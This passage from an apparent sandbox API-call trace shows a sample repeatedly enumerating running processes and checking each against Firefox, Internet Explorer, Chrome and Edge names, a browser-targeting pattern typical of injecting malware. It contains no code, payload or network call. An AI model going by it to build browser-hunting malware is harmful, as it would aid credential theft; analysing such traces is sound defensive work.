th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0233.611] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0233.611] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0233.611] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0233.611] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.611] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0233.611] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0233.611] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0233.611] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0233.611] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.611] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0233.612] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0233.612] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0233.612] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0233.612] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.612] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0233.612] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0233.612] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0233.612] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0233.612] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.612] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0233.613] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0233.613] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0233.613] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0233.613] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.613] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0233.614] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0233.614] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0233.614] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0233.614] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.614] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0233.614] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0233.614] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0233.614] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0233.614] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.614] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0233.615] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0233.615] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0233.615] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0233.615] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.615] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0233.615] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0233.615] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0233.615] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0233.615] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.615] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0233.616] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0233.616] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0233.616] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0233.616] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.616] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0233.617] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0233.617] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0233.617] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0233.617] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.617] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0233.617] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0233.617] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0233.617] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0233.617] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.617] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0233.618] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0233.618] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0233.618] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0233.618] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.618] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0233.618] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0233.618] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0233.618] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0233.628] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.628] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0233.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0233.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0233.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0233.629] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.629] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0233.629] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0233.629] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0233.629] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0233.630] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.630] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0233.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0233.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0233.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0233.630] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.630] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0233.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0233.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0233.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0233.631] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.631] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0233.631] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0233.631] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0233.631] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0233.631] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.631] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0233.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0233.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0233.632] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.632] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.632] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.632] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.632] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.632] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.632] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0233.633] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0233.633] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0233.633] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0233.633] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.633] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.633] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0233.633] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0233.633] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0233.634] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.634] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0233.634] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0233.634] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0233.634] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0233.634] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.634] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.635] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0233.635] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0233.635] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0233.635] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.635] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0233.635] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0233.635] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0233.635] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0233.635] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.635] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0233.636] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0233.636] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0233.636] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0233.636] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0233.636] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.637] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0233.637] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0233.637] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0233.637] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.637] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.637] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0233.637] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0233.637] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0233.637] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.637] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.638] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0233.638] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0233.638] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0233.638] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.638] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.638] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0233.638] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0233.638] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0233.638] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0233.638] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0233.639] CloseHandle (hObject=0xd4) returned 1 [0233.639] Sleep (dwMilliseconds=0x3e8) [0234.648] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0234.650] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.651] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0234.651] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0234.651] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0234.651] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0234.651] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0234.651] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0234.651] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0234.651] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0234.651] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0234.651] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0234.652] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0234.652] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0234.652] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0234.652] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.652] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.652] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0234.652] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0234.652] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0234.652] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.653] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0234.653] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0234.653] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0234.653] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0234.653] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.653] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.654] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0234.654] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0234.654] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0234.654] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.654] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0234.654] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0234.654] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0234.654] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0234.654] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.654] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0234.655] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0234.655] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0234.655] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0234.655] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0234.655] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0234.655] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0234.655] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0234.655] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0234.655] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0234.655] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, 